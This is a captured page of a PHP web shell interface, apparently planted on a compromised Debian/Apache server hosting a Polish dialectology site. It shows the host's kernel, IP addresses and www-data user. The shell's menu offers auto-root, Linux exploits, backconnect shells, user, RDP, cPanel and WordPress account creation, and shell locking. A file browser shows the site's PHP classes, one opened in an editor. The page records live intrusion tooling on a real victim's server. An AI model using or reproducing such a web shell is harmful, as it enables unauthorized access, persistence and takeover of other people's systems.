Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.217.237.68
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dialektologia /
web /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
maincontentclass.org
38.16
KB
-rw-r--r--
maincontentclass.php
38.64
KB
-rw-r--r--
mediaclass.php
1.53
KB
-rw-r--r--
rightmenuclass.php
6
KB
-rw-r--r--
userclass.php
5.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mediaclass.php
<?php class mediaclass { public static function GetMp3FilenameFromBigMessyContent($subjectcontent) { $regexpattern1 = '/param name=("|\')flashvars("|\') value=("|\')file=(.+)(&|&)backcolor=818947(&|&)frontcolor=eaf2b9/'; $regexpattern1a = '/param value=("|\')file=(.+)(&|&)backcolor=818947(&|&)frontcolor=eaf2b9/'; $regexpattern2 = '/<embed (.+) flashvars="file=(.+)(&|&)backcolor=818947(&|&)frontcolor=eaf2b9(&|&)lightcolor=eaf2b9(&|&)screencolor=818947/'; //not use f12, use "show source" in chrome, you will see more //1 preg_match($regexpattern1, $subjectcontent, $matches); if($matches !=null && strpos($matches[4],'.mp3')!==false) return $matches[4]; //1a preg_match($regexpattern1a, $subjectcontent, $matches); if($matches !=null && strpos($matches[2],'.mp3')!==false) return $matches[2]; //2 preg_match($regexpattern2, $subjectcontent, $matches); if($matches !=null && strpos($matches[1],'.mp3')!==false) return $matches[1]; } public static function GetHtml5AudioMarkupByMp3FilenameWithDir($mp3Filename) { $ret=' <div style="display:block;"><audio controls controlsList="nodownload" style="width: 100%;margin-top: 5px;"> <source src="'.$mp3Filename.'" type="audio/mpeg"> Twoja przeglÄ…darka nie wspiera elementu audio. </audio></div> '; return $ret; } }
Close